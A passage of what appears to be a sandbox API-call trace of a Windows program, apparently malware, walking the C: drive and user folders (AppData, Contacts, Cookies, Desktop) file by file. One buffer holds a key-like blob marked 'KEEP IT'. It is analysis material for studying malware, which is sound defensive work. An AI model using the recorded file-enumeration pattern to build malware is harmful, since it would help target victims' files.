(hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.896] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0067.896] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.896] lstrlenW (lpString="Office32WW.msi") returned 14 [0067.896] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.897] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.897] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0067.897] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.897] lstrlenW (lpString="{91140000-003B-0000-1000-0000000FF1CE}-C") returned 40 [0067.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5c04d8 [0067.903] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.903] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.904] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0067.904] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.904] lstrlenW (lpString="Office32WW.msi") returned 14 [0067.904] FindClose (in: hFindFile=0x5c04d8 | out: hFindFile=0x5c04d8) returned 1 [0067.905] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.905] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0067.905] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.905] lstrlenW (lpString="{91140000-0057-0000-1000-0000000FF1CE}-C") returned 40 [0067.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5c04d8 [0067.942] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.942] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.942] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0067.942] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.942] lstrlenW (lpString="Office32WW.msi") returned 14 [0067.942] FindClose (in: hFindFile=0x5c04d8 | out: hFindFile=0x5c04d8) returned 1 [0067.943] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.943] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0067.943] FindClose (in: hFindFile=0x5a3f38 | out: hFindFile=0x5a3f38) returned 1 [0067.943] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b81f0 | out: hHeap=0x580000) returned 1 [0067.943] FindNextFileW (in: hFindFile=0x5a3ef8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0067.943] FindClose (in: hFindFile=0x5a3ef8 | out: hFindFile=0x5a3ef8) returned 1 [0067.943] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x580000) returned 1 [0067.943] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0067.943] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.943] lstrlenW (lpString="pagefile.sys") returned 12 [0067.943] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName=".", cAlternateFileName="")) returned 0x5c04d8 [0067.944] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="..", cAlternateFileName="")) returned 1 [0067.944] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.944] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="Admin", cAlternateFileName="")) returned 1 [0067.944] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.944] lstrlenW (lpString="Admin") returned 5 [0067.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5a4020 [0067.944] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.944] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.944] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 0 [0067.944] FindClose (in: hFindFile=0x5a4020 | out: hFindFile=0x5a4020) returned 1 [0067.944] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.944] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="Admin", cAlternateFileName="")) returned 0 [0067.945] FindClose (in: hFindFile=0x5c04d8 | out: hFindFile=0x5c04d8) returned 1 [0067.945] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x580000) returned 1 [0067.945] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddcace80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddcace80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0067.945] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.945] lstrlenW (lpString="Program Files") returned 13 [0067.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName=".", cAlternateFileName="")) returned 0x5c04d8 [0067.945] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="..", cAlternateFileName="")) returned 1 [0067.945] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.945] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73baf637, dwReserved1=0xfb5199ba, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0067.945] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.945] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz") returned 20 [0067.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5a4020 [0067.945] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.945] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.945] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="AppData", cAlternateFileName="")) returned 1 [0067.946] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.946] lstrlenW (lpString="AppData") returned 7 [0067.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x5bf958, ftCreationTime.dwLowDateTime=0x5a4138, ftCreationTime.dwHighDateTime=0x2b0075, ftLastAccessTime.dwLowDateTime=0x610048, ftLastAccessTime.dwHighDateTime=0x650044, ftLastWriteTime.dwLowDateTime=0x620030, ftLastWriteTime.dwHighDateTime=0x720065, nFileSizeHigh=0x570055, nFileSizeLow=0x320034, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="YW30W3gbcJSA2WI70dhrX8J9bT8aReAg+oAXJ087GvxqGm\r\nAjOEp9xEKAKpESGQn9qhkssNcqiJqxfe73ksGTggNFZQHpZM9G6sJMFSMlgzu+Vg\r\n0/27RQwuH2br15+dWVimbaGrPX5yTHUezWWS33OKGIS=[end_key]\r\nKEEP IT\r\n", cAlternateFileName="")) returned 0xffffffff [0067.946] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0067.946] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Contacts", cAlternateFileName="")) returned 1 [0067.946] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.946] lstrlenW (lpString="Contacts") returned 8 [0067.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0067.946] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0067.946] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.946] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0067.946] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.946] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0067.946] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0067.947] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0067.947] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Cookies", cAlternateFileName="")) returned 1 [0067.947] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.947] lstrlenW (lpString="Cookies") returned 7 [0067.947] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x5bfa38, ftCreationTime.dwLowDateTime=0x5bace8, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0067.947] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0067.947] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaff8e240, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xaff8e240, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Desktop", cAlternateFileName="")) returned 1 [0067.947] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.947] lstrlenW (lpString="Desktop") returned 7 [0067.947] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaff8e240, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xaff8e240, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0067.947] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaff8e240, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xaff8e240, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0067.947] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.947] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc73810, ftCreationTime.dwHighDateTime=0x1d5e289, ftLastAccessTime.dwLowDateTime=0x8c1f60d0, ftLastAccessTime.dwHighDateTime=0x1d5d869, ftLastWriteTime.dwLowDateTime=0x8c1f60d0, ftLastWriteTime.dwHighDateTime=0x1d5d869, nFileSizeHigh=0x0, nFileSizeLow=0x12af7, dwReserved0=0x390037, dwReserved1=0x74004a, cFileName="0jGywidWNCSY.odp", cAlternateFileName="0JGYWI~1.ODP")) returned 1 [0067.947] WaitForSingleObject (hHandle=0x90, 